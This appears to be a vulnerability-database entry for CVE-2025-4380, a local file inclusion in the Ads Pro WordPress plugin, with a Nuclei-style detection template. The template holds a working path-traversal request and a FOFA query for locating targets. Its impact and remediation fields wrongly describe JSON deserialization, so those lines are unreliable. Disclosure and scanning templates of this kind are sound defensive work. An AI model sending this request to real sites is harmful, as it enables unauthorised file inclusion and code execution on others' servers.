CVE-2025-4380: Ads Pro Plugin <= 4.89 - Local File Inclusion

日期: 2025-08-01 | 影响软件: Ads Pro Plugin | POC: 已公开

漏洞描述

The Ads Pro Plugin - Multi-Purpose WordPress Advertising Manager plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.89 via the 'bsa_template' parameter of the `bsa_preview_callback` function. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases .php files can can be uploaded and included, or already exist on the site.

PoC代码[已公开]

id: CVE-2025-4380

info:
  name: Ads Pro Plugin <= 4.89 - Local File Inclusion
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    The Ads Pro Plugin - Multi-Purpose WordPress Advertising Manager plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.89 via the 'bsa_template' parameter of the `bsa_preview_callback` function. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases .php files can can be uploaded and included, or already exist on the site.
  impact: |
    Successful exploitation could allow an attacker to execute arbitrary code on the affected system through deserialization of malicious JSON payloads.
  remediation: |
    Update the Ads Pro Plugin to version later than 4.89. Alternatively, disable polymorphic type handling or implement proper input validation and deserialization controls.
  reference:
    - https://wpscan.com/vulnerability/63964564-73e6-45e2-8145-33e2e30d1d57/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-4380
  classification:
    epss-score: 0.18578
    epss-percentile: 0.95032
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-4380
    cwe-id: CWE-98
    cpe: cpe:2.3:a:scripteo:ads_pro:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: scripteo
    product: ads_pro
    fofa-query: body="/wp-content/plugins/ap-plugin-scripteo"
  tags: cve,cve2025,wp,wordpress,wp-plugin,lfi,scripteo,ads-pro

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=bsa_preview_callback&bsa_template=../php/example

    matchers:
      - type: dsl
        dsl:
          - "contains(body, 'Example PHP Ad')"
          - "contains(content_type, 'text/html')"
          - "status_code == 200"
        condition: and
# digest: 4b0a0048304602210084eee2b0e0b1bf331d75a4c07f7c7b3418b59d009a9e243661136fa2a45e012f02210085a150384e8b3f051946977157f905c987f9f4d46f5450f8aa578db183ee9312:922c64590222798bb761d5b6d8e72950

相关漏洞推荐